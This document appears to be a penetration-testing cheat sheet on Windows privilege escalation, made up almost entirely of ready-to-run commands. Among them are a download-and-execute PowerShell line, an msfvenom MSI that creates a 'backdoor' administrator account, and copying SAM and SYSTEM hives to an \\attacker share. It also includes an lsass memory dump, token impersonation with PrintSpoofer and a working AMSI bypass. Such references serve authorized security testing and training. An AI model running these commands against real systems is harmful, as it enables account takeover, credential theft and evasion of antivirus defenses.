Windows Privilege Escalation Techniques
Privilege escalation is a critical phase in penetration testing where we attempt to gain higher-level permissions on a Windows system. This comprehensive guide covers the most effective techniques and tools for Windows privilege escalation.
Table of Contents
- Initial Information Gathering
- Automated Tools
- Service Exploits
- Registry Exploits
- File Permissions
- Scheduled Tasks
- Passwords and Tokens
Initial Information Gathering
Before attempting privilege escalation, gather system information:
System Information
systeminfo
whoami /all
whoami /priv
net user %username%
net localgroup administrators
Network Information
ipconfig /all
route print
netstat -ano
Running Processes and Services
tasklist /svc
sc query
wmic service list brief
Automated Tools
WinPEAS
# Download and run WinPEAS
powershell -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
PowerUp
1
2
3
4
# Import PowerUp module
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks
Windows Exploit Suggester
1
2
# On Kali Linux
python windows-exploit-suggester.py --database 2021-09-21-mssb.xls --systeminfo systeminfo.txt
Service Exploits
Unquoted Service Paths
Look for services with unquoted paths containing spaces:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Service Permissions
Check if you can modify service configurations:
# Check service permissions
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Users" *
Service Binary Permissions
# Check if service binaries are writable
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\temp\permissions.txt
for /f %a in (c:\temp\permissions.txt) do @(icacls "%a" 2>nul | findstr "(M)" | findstr "Everyone\|BUILTIN\|Users")
Registry Exploits
AlwaysInstallElevated
Check if AlwaysInstallElevated is enabled:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If both return 0x1, you can install MSI packages as SYSTEM:
msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi
Registry AutoRuns
Check for writable registry autoruns:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
File Permissions
DLL Hijacking
Look for missing DLLs in application directories:
# Process Monitor (ProcMon) to identify missing DLLs
# Check PATH directories for writable locations
for %%A in ("%path:;=";"%") do ( cmd /c icacls "%%~A" 2>nul | findstr /i "(M)\|(F)" | findstr /i "everyone\|authenticated users\|users" && echo. )
Weak File Permissions
# Find writable files and directories
accesschk.exe -uws "Everyone" "C:\Program Files"
dir "C:\Program Files" /s /q | findstr /i "users"
Scheduled Tasks
View Scheduled Tasks
schtasks /query /fo LIST /v
PowerShell Method
1
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Check Task Permissions
# Check if you can modify scheduled task files
icacls C:\Windows\System32\Tasks\*
Passwords and Tokens
Credential Manager
cmdkey /list
runas /savecred /user:administrator cmd.exe
SAM and SYSTEM Files
# If you have access to backup SAM files
copy C:\Windows\Repair\SAM \\attacker\share\
copy C:\Windows\Repair\SYSTEM \\attacker\share\
Memory Dumps
# Look for credentials in memory
procdump.exe -ma lsass.exe lsass.dmp
PowerShell History
1
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Token Impersonation
SeImpersonatePrivilege
If you have SeImpersonatePrivilege, use tools like:
- JuicyPotato (Windows Server 2016 and earlier)
- RoguePotato (Windows 10 / Server 2019)
- PrintSpoofer (All Windows versions)
# Example with PrintSpoofer
PrintSpoofer.exe -i -c cmd
Kernel Exploits
Check Windows Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
Common Kernel Exploits
- MS16-032 (Windows 7 SP1/2008 R2 SP1)
- MS17-017 (Windows 7/8/10/2016)
- CVE-2019-1388 (Windows 7/8/10/2016/2019)
Detection and Evasion
Anti-Virus Evasion
1
2
# Check AV status
Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct
AMSI Bypass (PowerShell)
1
2
# AMSI Bypass example
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Best Practices
- Always gather system information first
- Use automated tools for initial reconnaissance
- Verify exploits in isolated environments first
- Document all findings for reporting
- Clean up artifacts after testing
Useful Resources
Remember to always test these techniques in authorized environments only. Privilege escalation should only be performed during legitimate penetration testing engagements with proper authorization.
Stay ethical, stay secure.